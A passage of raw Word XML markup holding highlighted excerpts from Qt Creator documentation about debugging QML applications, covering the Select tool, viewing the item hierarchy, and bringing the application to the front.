          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the selection mode, you can click items in the running application to jump to their definitions in the code</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The properties of the selected item are displayed in the</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locals and Expressions</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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3613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be enabled either if your application is using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt 5.7 or later</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or if your application is using an earlier version of Qt and is based on the</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickView</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also view the item hierarchy in the running application</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When debugging Qt Quick 1 applications, right-click an item in the running application to view the item hierarchy as a context menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qtcreator/images/qml-observer-context-menu.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1085" type="#_x0000_t75" alt="&quot;QML item hierarchy&quot;" style="width:368.65pt;height:164.15pt">
            <v:imagedata r:id="rId3034" r:href="rId3035"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When debugging </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 2</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>double-click an item in the running application to cycle through the item stack at the cursor position</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00F370E6" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To switch out of the selection mode, toggle the</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>menu item.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To move the application running in Qt QML Viewer to the front, select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Show Application on Top</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="00EA1A01" w:rsidRDefault="000B7D73" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00EA1A01" w:rsidRDefault="00C50BB7" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00EA1A01" w:rsidRDefault="00C50BB7" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC5A43" w:rsidRPr="00EC78A6" w:rsidRDefault="00FC5A43" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC5A43" w:rsidRPr="00EC78A6" w:rsidRDefault="00FC5A43" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00555E67" w:rsidRPr="00EC78A6" w:rsidRDefault="00555E67" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00EC78A6" w:rsidRDefault="00815754" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00EC78A6" w:rsidRDefault="00B55535" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRPr="00EC78A6" w:rsidRDefault="00B55535" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A40BC4" w:rsidRPr="00EC78A6" w:rsidRDefault="00EC78A6" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC78A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>ф</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A40BC4" w:rsidRPr="00EC78A6" w:rsidSect="006E43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Droid Sans Mono">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76FE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8307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274B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA5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03BF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB9A7F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655F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9D8D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B7A07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D92E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090426"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A0C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67719"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6F0B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D3F05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B656A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175CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFF2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941F29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FF2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86488D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1970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1B637E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54B87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9E1FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A306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5F726E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="685C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1E50B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C804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4A6723"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BF4C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2524A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F58E0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D37B92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C82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253B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FA2A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9F07C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B420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6C7640"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A2C0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A04D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C722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1D0836"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8340A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8D4203"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49940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093E07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3988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BA5DD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="559E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934697"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2420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41292E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA8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67107E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9BAC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507928"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6840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D730CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53FA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FA6FDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6DAD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C8825CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E78C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CA037B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D9EC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386111"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E586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805114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89645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F23FE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5590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2E6D71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0926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24465A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C6A3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7173DD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4530D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381A022C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC7C0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8F5458F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A718F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4E6A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93D0F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657EB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9866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E3D6EB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98BA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EC8463B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECF8A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F7777F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197C1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0D6D4B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E14B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A95A2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14988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25743F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4502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D17142"/>
